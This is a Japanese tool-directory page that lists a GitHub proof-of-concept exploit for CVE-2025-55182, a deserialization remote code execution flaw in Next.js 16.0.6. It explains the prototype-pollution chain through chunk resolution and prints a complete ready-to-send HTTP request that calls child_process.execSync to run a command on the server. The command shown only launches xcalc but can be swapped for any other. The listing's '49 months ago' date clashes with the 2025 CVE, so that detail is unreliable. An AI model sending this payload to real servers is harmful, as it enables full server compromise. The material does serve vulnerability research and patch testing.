Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-RCE-Exploit — よりエクスプロイトに特化; セキュリティ研究リポジトリに最適。 | Kitploit
ツール/GitHubGitHub/orgito1015/cve-2025-55182-rce-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用論文と研究学習と教育ペイロード開発
GitHuborgito1015/cve-2025-55182-rce-exploit

CVE-2025-55182-RCE-Exploit

よりエクスプロイトに特化; セキュリティ研究リポジトリに最適。

リポジトリを見る
49ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 のPOC – Next.js 16.0.6 リモートコード実行

このリポジトリには、Next.js 16.0.6 に影響を及ぼす重大なデシリアライゼーション脆弱性 CVE-2025-55182 の実用的な概念実証(POC)が含まれています。このエクスプロイトは、$@ チャンクのデシリアライゼーションと Chunk.prototype.then を悪用して、チャンク解決プロセスの完全な制御を取得し、サーバー上で**任意コード実行(RCE)**を達成します。

脆弱性の概要

Next.js は、サーバーアクションのために内部の Chunk オブジェクトとストリーミング/デシリアライゼーションメカニズムを使用します。 $@ を悪用して Chunk 参照 をデシリアライズし、Chunk.prototype.then をルートオブジェクトに注入することで、攻撃者は以下を実行できます:

  • Next.js に攻撃者が制御する this で then(...) を呼び出させる
  • チャンクの status を resolved_model に設定する
  • 攻撃者が完全に制御する偽のチャンクで initializeModelChunk をトリガーする
  • chunk._response メソッドを悪用して危険な内部動作に到達する

最終目標は、次のような呼び出しを実行する Blob デシリアライゼーション をトリガーすることです:

response._formData.get(response._prefix)

response._formData.get = Function を設定し、response._prefix に任意のコードを配置することで、攻撃者は任意のシステムコマンドを実行できます。

エクスプロイト POC

poc/CVE-2025-55182.http 内の HTTP リクエストは、ローカルで動作している Next.js 16.0.6 に対するエクスプロイトを示しており、child_process.execSync 経由で xcalc を起動します:

POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

リポジトリ構成

/
├── README.md
├── DISCLAIMER.md
├── poc/
│   └── CVE-2025-55182.http
└── analysis/
    └── exploitation-notes.md

免責事項

このプロジェクトは、教育および研究目的のみ に提供されています。所有していないシステム、または明示的な書面によるテストの許可を得ていないシステムに対して、このエクスプロイトを使用しないでください。

著者は、誤用または生じた損害について一切の責任を負いません。

ツールをダウンロード